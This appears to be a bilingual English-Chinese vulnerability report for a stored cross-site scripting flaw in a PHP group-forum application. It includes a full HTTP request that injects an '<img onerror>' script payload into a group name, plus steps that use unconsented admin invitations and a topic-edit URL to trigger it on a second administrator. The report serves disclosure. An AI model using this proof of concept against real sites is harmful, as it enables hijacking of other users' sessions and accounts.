Description
Stored xss when administrator edits posts in the same group, or just click a url
存储型跨站漏洞,当组管理员修改组内帖子时触发,也可直接点击触发
Ways to reproduce:
复现方法:
1 admin1 creates a new group with the following request, notice that the malicious code has been injected in groupname param.
1 admin1使用如下请求建立一个小组,注意groupname字段已经被注入恶意代码。
POST /index.php?app=group&ac=create&ts=do HTTP/1.1
Host: youdomain
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data; boundary=---------------------------159522762613371
Content-Length: 685
Cookie:
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------159522762613371
Content-Disposition: form-data; name="groupname"
`<img src=1 onerror=alert(1)>`
-----------------------------159522762613371
Content-Disposition: form-data; name="groupdesc"
aaaaaaaaaaaaaaa
-----------------------------159522762613371
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream
-----------------------------159522762613371
Content-Disposition: form-data; name="tag"
aaaaaaaaaaaaaaa
-----------------------------159522762613371
Content-Disposition: form-data; name="token"
99dc80d60a3284e86a8eef06c28a932f5614d29a
-----------------------------159522762613371--
2 admin1 invites admin2 as an administrator of this new group and post anything. PS: without agreement, one could invite anyone as his group adminstrator.
2 admin1邀请admin2作为小组管理员,并发帖。同时:邀请别人成为小组管理员并不需要获得其同意。
3 once admin2 edits any posts in this group, or just click: http://yourdomian/thinknew/index.php?app=group&ac=topicedit&topicid={your_topic_id_which_easy_to_get}
admin2 would execute the js code which had been injected in the group name.
3 当admin2管理组内帖子时,或只是点击url:http://yourdomian/thinknew/index.php?app=group&ac=topicedit&topicid={你的topic id,很容易获取}
admin2将执行已经被嵌入groupname中的js代码